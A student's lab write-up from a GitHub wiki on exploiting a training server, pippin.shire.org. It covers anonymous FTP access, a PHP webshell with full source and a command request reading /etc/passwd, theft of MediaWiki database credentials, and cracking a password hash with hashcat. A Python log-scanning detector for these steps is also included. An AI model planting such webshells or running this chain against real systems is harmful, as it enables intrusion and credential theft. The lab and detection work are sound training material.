Lab 7.1: Exploiting Pippin - squatchulator/Tech-Journal GitHub Wiki

Lab 7.1 - Exploiting Pippin

This lab is aimed at exploiting the server pippin.shire.org (10.0.5.25) using the reconnaissance methods we have covered in previous labs. I had a difficult time finding out how to properly check the hash for Pippin's password, as there were not a lot of resources online specifying how to do this, or how the key was supposed to be formatted in the file. The systems administrator for this box made a few mistakes that allowed it to be exploited, namely allowing root permissions for somebody SSHing into the box. It would also be hard to tell where FTP server activity is coming from, as the FTP authentication method was set to anonymous.

Step 1: Active Reconnaissance & Service Enumeration

  • Perform an Nmap service scan of the open ports on the server using sudo nmap -sV 10.0.5.25
  • In this example, the FTP port was open and the service was running.
    • To access it, start an FTP connection with ftp 10.0.5.25. You will be prompted for a username and password. Enter anonymous as the username, and guest as the password.
    • Now that you are in FTP, run ls to see what directories are there. You can change into a directory, and upload a file from your current local working directory with put <filename>.

Step 2: Uploading a Webshell

  • Create a PHP script in your working directory that contains the following:
<?php
// Runs whatever is passed in the cmd parameter with the web server's privileges and returns the output.
if(isset($_REQUEST['cmd'])){
     echo "<pre>";
     $cmd = $_REQUEST['cmd'];
     system($cmd);
     echo "</pre>";
     die;
}
?>
  • FTP into the server again, and put the file into the /uploads folder.
  • Execute webshell commands with: 10.0.5.25/upload/<filename.php>?cmd=cat+/etc/passwd

Step 3: Leveraging Access

  • Once you have FTP access, you should see a LocalSettings.php file on the server. This contains the root username and password used by the MediaWiki server.
  • To pull this file, run get, hit enter, and type the name of the file followed by the local directory you want to copy it to.
  • You should now be able to log in as the peregrin.took user using the $wgDBpassword value found in the LocalSettings file.
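A defender-side check for the two anonymous-FTP actions this chain relies on: a server-side script dropped into the upload directory (Step 2) and LocalSettings.php pulled off the box (Step 3). This is an added example, not part of the original lab; it assumes the FTP service logs in vsftpd's vsftpd.log style, and the log lines, client addresses and filenames are constructed.

```python
import re
from typing import List, Dict

# Constructed sample lines in the style of vsftpd's vsftpd.log (assumption:
# the FTP service is vsftpd; client addresses and filenames are made up).
SAMPLE_LOG = """\
Mon Oct  2 14:01:07 2023 [pid 2103] CONNECT: Client "10.0.5.50"
Mon Oct  2 14:01:09 2023 [pid 2102] [anonymous] OK LOGIN: Client "10.0.5.50"
Mon Oct  2 14:01:15 2023 [pid 2104] [anonymous] OK UPLOAD: Client "10.0.5.50", "/uploads/notes.txt", 412 bytes, 3.21Kbyte/sec
Mon Oct  2 14:02:40 2023 [pid 2104] [anonymous] OK UPLOAD: Client "10.0.5.50", "/uploads/cmd.php", 148 bytes, 1.10Kbyte/sec
Mon Oct  2 14:03:02 2023 [pid 2104] [anonymous] OK DOWNLOAD: Client "10.0.5.50", "/LocalSettings.php", 5120 bytes, 40.00Kbyte/sec
Mon Oct  2 14:05:11 2023 [pid 2110] [peregrin.took] OK UPLOAD: Client "10.0.5.51", "/uploads/report.pdf", 90210 bytes, 512.00Kbyte/sec
"""

LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3}\s+\d+ \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]+)\] OK (?P<action>UPLOAD|DOWNLOAD): '
    r'Client "(?P<client>[^"]+)", "(?P<path>[^"]+)"'
)

# Extensions the web server will execute if the FTP upload directory overlaps the web root.
SCRIPT_EXTS = (".php", ".phtml", ".php5", ".phar")
# Files whose download by an anonymous user discloses credentials (MediaWiki keeps
# $wgDBpassword in LocalSettings.php, as the lab notes).
SENSITIVE_FILES = ("LocalSettings.php",)

def find_suspicious_transfers(log_text: str) -> List[Dict[str, str]]:
    """Return one finding per log line that records a high-risk anonymous transfer."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["user"] != "anonymous":
            continue
        path = m["path"]
        if m["action"] == "UPLOAD" and path.lower().endswith(SCRIPT_EXTS):
            reason = "anonymous upload of server-side script"
        elif m["action"] == "DOWNLOAD" and path.rsplit("/", 1)[-1] in SENSITIVE_FILES:
            reason = "anonymous download of configuration file"
        else:
            continue
        findings.append({"time": m["ts"], "client": m["client"], "path": path, "reason": reason})
    return findings

if __name__ == "__main__":
    for f in find_suspicious_transfers(SAMPLE_LOG):
        print(f"{f['time']}  {f['client']}  {f['path']}  ({f['reason']})")
```

On the sample above the text upload and the authenticated PDF upload are ignored; only the PHP upload and the LocalSettings.php download are reported.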

Step 4: Elevation

  • Access the MySQL database by running: /bin/mysql -u root -p and entering the password above when prompted.
  • Run SHOW DATABASES; and select the mediawiki database with USE mediawiki;
  • List the tables in the database with SHOW TABLES; and query a table with SELECT * FROM mediawiki;
  • You should see a hash for Pippin. Copy it into a text file called hash.txt on your desktop, and delete everything before the hash itself starts (i.e. the leading fields such as :pbkdf2 and :64:).
  • In a terminal, using the smaller rockyou wordlist from previous labs, run grep -o '\bp[a-zA-Z]*\b' <rockyou list>.txt > pippin_passwords.txt to put all passwords starting with a lowercase p into a file.
  • Now, run hashcat with the command hashcat -m 12100 hash.txt -w 4 -a 0 pippin_passwords.txt